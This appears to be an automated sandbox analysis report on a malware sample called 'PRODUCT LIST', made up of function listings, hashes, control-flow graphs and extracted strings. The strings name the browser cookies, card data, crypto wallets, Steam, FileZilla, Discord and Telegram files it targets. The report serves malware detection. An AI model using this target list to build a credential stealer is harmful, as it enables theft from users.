                                                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasf, xrefs: 064DEA43
                                                                                        • ${q, xrefs: 064DEAFE
                                                                                        • ${q, xrefs: 064DEB0A
                                                                                        • DisplayNameexpiry*.vstring.ReplacedfJaxxpath, xrefs: 064DEAC7
                                                                                        • DisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcoo, xrefs: 064DEB32
                                                                                        • ${q, xrefs: 064DEB73
                                                                                        • ${q, xrefs: 064DEB7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DisplayNameexpiry*.vstring.ReplacedfJaxxpath$DisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcoo$SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasf$[^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\d$${q$${q$${q$${q
                                                                                        • API String ID: 0-1643225150
                                                                                        • Opcode ID: a22703ef2870da825fd524de4e568bb9b637686d10077c9ef42a7ee4127a8280
                                                                                        • Instruction ID: d8e72630bbc832ff7cb254caf0d8ab78cde4d80d5daf00217e95e2c219661c6a
                                                                                        • Opcode Fuzzy Hash: a22703ef2870da825fd524de4e568bb9b637686d10077c9ef42a7ee4127a8280
                                                                                        • Instruction Fuzzy Hash: CA71A231E007099BDB19EF74C4642AEB7B2FF85300F64862AD406AB395DF75AD81CB80
                                                                                        Function 064DBB79 Relevance: 6.5, Strings: 5, Instructions: 278COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 659 64dbb79-64dbc10 669 64dbc1a-64dbc26 659->669 670 64dbc2e-64dbfb4 call 64db830 call 64db7f8 669->670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (_{q$(_{q$${q$${q$${q
                                                                                        • API String ID: 0-3983009153
                                                                                        • Opcode ID: 4277b556152bdcdd3221f2558bd2caea801c63fc44b28949bda313d2272ee435
                                                                                        • Instruction ID: 7d8db21eb26d2f0be68fabba32164b0c2c3c2a871a25a2c0e4a413edd1a60541
                                                                                        • Opcode Fuzzy Hash: 4277b556152bdcdd3221f2558bd2caea801c63fc44b28949bda313d2272ee435
                                                                                        • Instruction Fuzzy Hash: BCC119B0A002089FDF05EFB8D855A9EBBB6FF88304F108569E401BB250DB7AAD45DF51
                                                                                        Function 064DBB88 Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 731 64dbb88-64dbc26 741 64dbc2e-64dbfb4 call 64db830 call 64db7f8 731->741
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (_{q$(_{q$${q$${q$${q
                                                                                        • API String ID: 0-3983009153
                                                                                        • Opcode ID: a4dcec0987ffa20445eeb113d2d7740fe96ab4094b432c1e4fea7f074a85cb2c
                                                                                        • Instruction ID: b8ab9db662e4f2956aa92d66d354c82b83e6f64d07cc46fe46d09907e74371d5
                                                                                        • Opcode Fuzzy Hash: a4dcec0987ffa20445eeb113d2d7740fe96ab4094b432c1e4fea7f074a85cb2c
                                                                                        • Instruction Fuzzy Hash: 8DC119B0A002089FDF05EFA8D855AAEBBB6FF88304F508569E101BB350DB79AD45DF51
                                                                                        Function 064DE9D0 Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 802 64de9d0-64dea85 call 64d5f20 810 64dea8b-64dea94 802->810 811 64dec95-64deca8 802->811 813 64decaa 810->813 814 64dea9a-64deaaf 810->814 812 64decaf-64decb3 811->812 815 64decbe 812->815 816 64decb5 812->816 813->812 819 64deab5-64deaf2 814->819 820 64deab1-64deab3 814->820 818 64decbf 815->818 816->815 818->818 821 64deafa-64deafc 819->821 820->821 822 64deafe-64deb04 821->822 823 64deb14-64deb1a 821->823 825 64deb08-64deb0a 822->825 826 64deb06 822->826 827 64deb1c-64deb1e 823->827 828 64deb20-64deb65 823->828 825->823 826->823 829 64deb6f-64deb71 827->829 843 64deb6d 828->843 832 64deb89-64deb8d 829->832 833 64deb73-64deb79 829->833 836 64deb8f-64deb99 832->836 837 64deb9b 832->837 834 64deb7d-64deb87 833->834 835 64deb7b 833->835 834->832 835->832 838 64deba0-64deba2 836->838 837->838 840 64dec4e-64dec67 838->840 841 64deba8-64debb1 838->841 846 64dec69 840->846 847 64dec72-64dec8f 840->847 841->840 848 64debb7-64dec3b 841->848 843->829 846->847 847->810 847->811 856 64dec42-64dec47 848->856 856->840
                                                                                        Strings
                                                                                        • [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\d, xrefs: 064DEBFF
                                                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasf, xrefs: 064DEA43
                                                                                        • ${q, xrefs: 064DEAFE
                                                                                        • ${q, xrefs: 064DEB73
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasf$[^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\d$${q$${q
                                                                                        • API String ID: 0-765418106
                                                                                        • Opcode ID: ffe3b3ec9ce11ccce31b2c1488eb1287ba0d093f4eda8a41b4a1db974ad28bda
                                                                                        • Instruction ID: 3221eda0c0f8849501e3c169655cfd857a7426b8150f50eb7ceb6c78cb11c6cf
                                                                                        • Opcode Fuzzy Hash: ffe3b3ec9ce11ccce31b2c1488eb1287ba0d093f4eda8a41b4a1db974ad28bda
                                                                                        • Instruction Fuzzy Hash: 8C51C170E013059FEB19DF74C8646AABBB2FF85300F24856AD406AB391DB759D46CB90
                                                                                        Function 064D1E74 Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 857 64d1e74-64d1e76 858 64d1e7d-64d1e7f 857->858 859 64d1e78-64d1e7a 857->859 861 64d1e81-64d1f05 call 64d11ac call 64d11bc 858->861 859->861 862 64d1e7c 859->862 918 64d1f0a call 64d24e1 861->918 919 64d1f0a call 64d24f0 861->919 862->858 873 64d1f10-64d1f36 876 64d1f3d-64d1f62 873->876 877 64d1f38-64d1f3a 873->877 881 64d1f64-64d1f6e 876->881 882 64d1f70 876->882 877->876 883 64d1f75-64d1f77 881->883 882->883 884 64d1f7d-64d1fea call 64d11ac call 64d11bc 883->884 885 64d2024-64d202c 883->885 909 64d1fec-64d2018 884->909 910 64d201a-64d201f 884->910 886 64d202e-64d2038 885->886 887 64d203a 885->887 888 64d203f-64d2041 886->888 887->888 890 64d2047-64d20c3 call 64d11ac call 64d11bc 888->890 891 64d20d1-64d20db 888->891 890->891 909->885 910->885 918->873 919->873
                                                                                        Strings
                                                                                        • https://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C , xrefs: 064D1FAA
                                                                                        • https://api.ip.sb/geoip%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN, xrefs: 064D1ED5
                                                                                        • https://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathw, xrefs: 064D2074
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: https://api.ip.sb/geoip%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN$https://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathw$https://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C
                                                                                        • API String ID: 0-2719993690
                                                                                        • Opcode ID: e87429b924619d19c57a12e22215ee25377d1ed40a836419e43aa8528a4f5913
                                                                                        • Instruction ID: 9cc95f2d33be569bee00a1fd6aaed70d6ccbc33a3dc36069138f3e55ff749908
                                                                                        • Opcode Fuzzy Hash: e87429b924619d19c57a12e22215ee25377d1ed40a836419e43aa8528a4f5913
                                                                                        • Instruction Fuzzy Hash: AC618F70B002048FDF48EF78C964AAEBBE2AF89340F14847AD909EB365DA75DD41CB50
                                                                                        Function 064D1E80 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 920 64d1e80-64d1f05 call 64d11ac call 64d11bc 977 64d1f0a call 64d24e1 920->977 978 64d1f0a call 64d24f0 920->978 932 64d1f10-64d1f36 935 64d1f3d-64d1f62 932->935 936 64d1f38-64d1f3a 932->936 940 64d1f64-64d1f6e 935->940 941 64d1f70 935->941 936->935 942 64d1f75-64d1f77 940->942 941->942 943 64d1f7d-64d1fea call 64d11ac call 64d11bc 942->943 944 64d2024-64d202c 942->944 968 64d1fec-64d2018 943->968 969 64d201a-64d201f 943->969 945 64d202e-64d2038 944->945 946 64d203a 944->946 947 64d203f-64d2041 945->947 946->947 949 64d2047-64d20c3 call 64d11ac call 64d11bc 947->949 950 64d20d1-64d20db 947->950 949->950 968->944 969->944 977->932 978->932
                                                                                        Strings
                                                                                        • https://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C , xrefs: 064D1FAA
                                                                                        • https://api.ip.sb/geoip%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN, xrefs: 064D1ED5
                                                                                        • https://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathw, xrefs: 064D2074
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: https://api.ip.sb/geoip%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN$https://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathw$https://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C
                                                                                        • API String ID: 0-2719993690
                                                                                        • Opcode ID: 83b1f9c5175c51d9fb48f1f8d6c54a6cc88eb1e294795f099400facf7dab6be8
                                                                                        • Instruction ID: 541e0b1c6bb3a06b19580378e4602e6c0844f739ad0bf628f93019f348c8f495
                                                                                        • Opcode Fuzzy Hash: 83b1f9c5175c51d9fb48f1f8d6c54a6cc88eb1e294795f099400facf7dab6be8
                                                                                        • Instruction Fuzzy Hash: 0B517C70B002058FDB44EF78C964BAEBBE2AF89344F548479E909EB361DA75DD42CB50
                                                                                        Function 064DEC75 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 979 64dec75-64dec7c 980 64dec83-64dec8f 979->980 981 64dea8b-64dea94 980->981 982 64dec95-64deca8 980->982 984 64decaa 981->984 985 64dea9a-64deaaf 981->985 983 64decaf-64decb3 982->983 986 64decbe 983->986 987 64decb5 983->987 984->983 990 64deab5-64deae9 985->990 991 64deab1-64deab3 985->991 989 64decbf 986->989 987->986 989->989 1001 64deaf0-64deaf2 990->1001 992 64deafa-64deafc 991->992 993 64deafe-64deb04 992->993 994 64deb14-64deb1a 992->994 996 64deb08-64deb0a 993->996 997 64deb06 993->997 998 64deb1c-64deb1e 994->998 999 64deb20-64deb5c 994->999 996->994 997->994 1000 64deb6f-64deb71 998->1000 1010 64deb63-64deb65 999->1010 1003 64deb89-64deb8d 1000->1003 1004 64deb73-64deb79 1000->1004 1001->992 1007 64deb8f-64deb99 1003->1007 1008 64deb9b 1003->1008 1005 64deb7d-64deb87 1004->1005 1006 64deb7b 1004->1006 1005->1003 1006->1003 1009 64deba0-64deba2 1007->1009 1008->1009 1011 64dec4e-64dec67 1009->1011 1012 64deba8-64debb1 1009->1012 1014 64deb6d 1010->1014 1017 64dec69 1011->1017 1018 64dec72 1011->1018 1012->1011 1019 64debb7-64dec2c 1012->1019 1014->1000 1017->1018 1018->979 1024 64dec33-64dec3b 1019->1024 1025 64dec42-64dec47 1024->1025 1025->1011
                                                                                        Strings
                                                                                        • [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\d, xrefs: 064DEBFF
                                                                                        • ${q, xrefs: 064DEAFE
                                                                                        • ${q, xrefs: 064DEB73
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\d$${q$${q
                                                                                        • API String ID: 0-3974778204
                                                                                        • Opcode ID: 75ba817fdf45becac9b9ca5a564a0ee1fbb63a4d7e42b588b501a1a75f2aa9f5
                                                                                        • Instruction ID: 9195c506c3ecd774a9aa48cc3c084af64273ff038c9ce243ce7ef687b257d0ac
                                                                                        • Opcode Fuzzy Hash: 75ba817fdf45becac9b9ca5a564a0ee1fbb63a4d7e42b588b501a1a75f2aa9f5
                                                                                        • Instruction Fuzzy Hash: C2417130E00306DFDF65DF64C5A43AEBBB2BF85300F24852AD406AB395DB74A981CB90
                                                                                        Function 064DB900 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1073 64db900-64db90a 1074 64db90c-64db91b 1073->1074 1075 64db944-64db949 1073->1075 1077 64db91d-64db923 1074->1077 1078 64db933-64db935 1074->1078 1079 64db925 1077->1079 1080 64db927-64db929 1077->1080 1081 64db93d-64db940 1078->1081 1079->1078 1080->1078 1081->1075
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ${q$${q
                                                                                        • API String ID: 0-899695794
                                                                                        • Opcode ID: a11340afd56b2290f85f86c06b26df2d67047c9d2bce0b6e03cb0a4d3ced37a8
                                                                                        • Instruction ID: 64fdd75975500a3a2e294f17b1612fd8b50c49d34c60ea7de18594a9916b2109
                                                                                        • Opcode Fuzzy Hash: a11340afd56b2290f85f86c06b26df2d67047c9d2bce0b6e03cb0a4d3ced37a8
                                                                                        • Instruction Fuzzy Hash: 50E0ED70F08794CFDBBA9628941032BBBE9EB84620F0000ABC48283B01DBB9FC418781
                                                                                        Function 01000CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1899 1000ce0-1000d54 GetConsoleWindow 1902 1000d56-1000d5c 1899->1902 1903 1000d5d-1000d82 1899->1903 1902->1903
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2199105778.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1000000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2863861424-0
                                                                                        • Opcode ID: 33f940e7d7a5335cf74125b53d3e3a7e046527f935ad16b59675c8341361b842
                                                                                        • Instruction ID: a61468439c08a9bbbf380e60e9c965d342f62145cd7c2faaaf1350068a7576b9
                                                                                        • Opcode Fuzzy Hash: 33f940e7d7a5335cf74125b53d3e3a7e046527f935ad16b59675c8341361b842
                                                                                        • Instruction Fuzzy Hash: 441146B1D042498FDB20DFAAC444BDEFFF4AB88324F24845AC459A7250C6796544CFA0
                                                                                        Function 01001870 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 010018BE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2199105778.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1000000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatcherExceptionUser
                                                                                        • String ID:
                                                                                        • API String ID: 6842923-0
                                                                                        • Opcode ID: 249121af9b55aa3b2a3658d8ca3f230a0c02142062faf796fbe84ce7f9bfbfb9
                                                                                        • Instruction ID: fd8f0f9309fedf22ae1b982927f441254515292211c8b42fd702732dd03847af
                                                                                        • Opcode Fuzzy Hash: 249121af9b55aa3b2a3658d8ca3f230a0c02142062faf796fbe84ce7f9bfbfb9
                                                                                        • Instruction Fuzzy Hash: 97010C71F002158FCF88EBB9D8145AEBBF5EF88610B1148A9E545E7360EA34DE018B90
                                                                                        Function 01000CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1907 1000ce8-1000d54 GetConsoleWindow 1910 1000d56-1000d5c 1907->1910 1911 1000d5d-1000d82 1907->1911 1910->1911
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2199105778.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1000000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2863861424-0
                                                                                        • Opcode ID: e131721c039221b401a90c36209b0ad2369048972300349aeceb8ae295e546fe
                                                                                        • Instruction ID: c2a5b88e65b306b9b6160936c334aa469fc219bb2b7f3c703e581a7d1a82f853
                                                                                        • Opcode Fuzzy Hash: e131721c039221b401a90c36209b0ad2369048972300349aeceb8ae295e546fe
                                                                                        • Instruction Fuzzy Hash: 3E1136B1D002498FDB24DFAAC445BDEFFF4EB88324F14841AD459A7240CB39A544CBA4
                                                                                        Function 064D3E10 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LR{q
                                                                                        • API String ID: 0-1953965008
                                                                                        • Opcode ID: 7918d4127b9fb6490a64a7379565d3df77d0200df98a074ebcb42511c8d8d5f5
                                                                                        • Instruction ID: ce381165b627ff5764565cb27b1387cb68d7e50655b896ab9ea3f74df2f68e1c
                                                                                        • Opcode Fuzzy Hash: 7918d4127b9fb6490a64a7379565d3df77d0200df98a074ebcb42511c8d8d5f5
                                                                                        • Instruction Fuzzy Hash: 4571F471F042668FEB979F35882067F7BA3AB86200F04447BE505DB381DA39CD02D791
                                                                                        Function 06521198 Relevance: 1.4, Instructions: 1412COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205726688.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6520000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5f54e764842ea49c0c0c1847dc637ce47c7e89ecb4b2274a7a771f66044de7f2
                                                                                        • Instruction ID: 14ecf64ebea498de73988e338c6f9c50a18162a67f10def2b2fb25d3e97c748b
                                                                                        • Opcode Fuzzy Hash: 5f54e764842ea49c0c0c1847dc637ce47c7e89ecb4b2274a7a771f66044de7f2
                                                                                        • Instruction Fuzzy Hash: 77C21C74B006199FCB15DB68CC90EAEBBB6FF89700F108095E605AB3A1DB71ED818F51
                                                                                        Function 064DEE8C Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ${q
                                                                                        • API String ID: 0-4291956445
                                                                                        • Opcode ID: 6475fb826c98b4f58ac371d99ee46c3c7a3aa59603ac844ef4eea30fb55cc744
                                                                                        • Instruction ID: 8145dddb9f7a8fa987efaa623949a3cb517c9d8af1bc4777b881be50902e75b4
                                                                                        • Opcode Fuzzy Hash: 6475fb826c98b4f58ac371d99ee46c3c7a3aa59603ac844ef4eea30fb55cc744
                                                                                        • Instruction Fuzzy Hash: C5316B30E04204DFDF65DB75D8606AEB7B6AF88305B60887EC406AB391DF399846DB91
                                                                                        Function 064D3E00 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LR{q
                                                                                        • API String ID: 0-1953965008
                                                                                        • Opcode ID: 41302074c6ba5e475026d91dbe7ab50961f1ce6e06e7fbac83155ae82625c199
                                                                                        • Instruction ID: e4bbe1bbfdbc0640e07e79c93a751cfdac0f1af8b248d06ffdfeadd8a3f3e508
                                                                                        • Opcode Fuzzy Hash: 41302074c6ba5e475026d91dbe7ab50961f1ce6e06e7fbac83155ae82625c199
                                                                                        • Instruction Fuzzy Hash: 833105B2E04255AFDB975F74882167FBBB3AF46200F54446FE451EB380EB358902C7A2
                                                                                        Function 064D879F Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: a{q
                                                                                        • API String ID: 0-598356130
                                                                                        • Opcode ID: 849885ce4f85fe6685c6a174198129f7f0feb0dd2eae57f19054ad09c8d98e30
                                                                                        • Instruction ID: f2624453c96cacc292e878866f07b1a2fdd8354c9b1cba9fc8e4d27001c98265
                                                                                        • Opcode Fuzzy Hash: 849885ce4f85fe6685c6a174198129f7f0feb0dd2eae57f19054ad09c8d98e30
                                                                                        • Instruction Fuzzy Hash: 3021A670A007049FC354EF2EC84165AFBE6FFC5300B40CA2DE04A9B221EF70E9858B91
                                                                                        Function 064D62D1 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'{q
                                                                                        • API String ID: 0-2294677784
                                                                                        • Opcode ID: ca80da392df6f14040295e26cea817c885fb2e324277329c3c869cf6f6869490
                                                                                        • Instruction ID: 8af2de49662e12e186c719fb4195596a038ab5efe887feab7d6a19ca2424bb58
                                                                                        • Opcode Fuzzy Hash: ca80da392df6f14040295e26cea817c885fb2e324277329c3c869cf6f6869490
                                                                                        • Instruction Fuzzy Hash: 99315E70A002099FEB08EF68E855B9E7BB6EB84301F108679E105A7395DB796E41CF90
                                                                                        Function 064D87B0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: a{q
                                                                                        • API String ID: 0-598356130
                                                                                        • Opcode ID: 11988bcc5ffa64e5b59412eb8e906d25c96547e816491cee7921f2313822ab70
                                                                                        • Instruction ID: ca5d4c4e37bbc7a9040263d2ece55e95f7a96e6390e30bca094afc0e426b53bd
                                                                                        • Opcode Fuzzy Hash: 11988bcc5ffa64e5b59412eb8e906d25c96547e816491cee7921f2313822ab70
                                                                                        • Instruction Fuzzy Hash: 80213570A10B049FD354EF2EC95156AFBE6EFC5300B44CA2DE04A9B625EF70E9858B90
                                                                                        Function 064D62E0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'{q
                                                                                        • API String ID: 0-2294677784
                                                                                        • Opcode ID: 20ba09f11a20bf24ae625e5eafeeedd19d4ebe0318d92bf92ae274a53977ea7c
                                                                                        • Instruction ID: 7e7deb977d4903622d01c8ed10b507845cb60115a38f061cb970d83d6cc33359
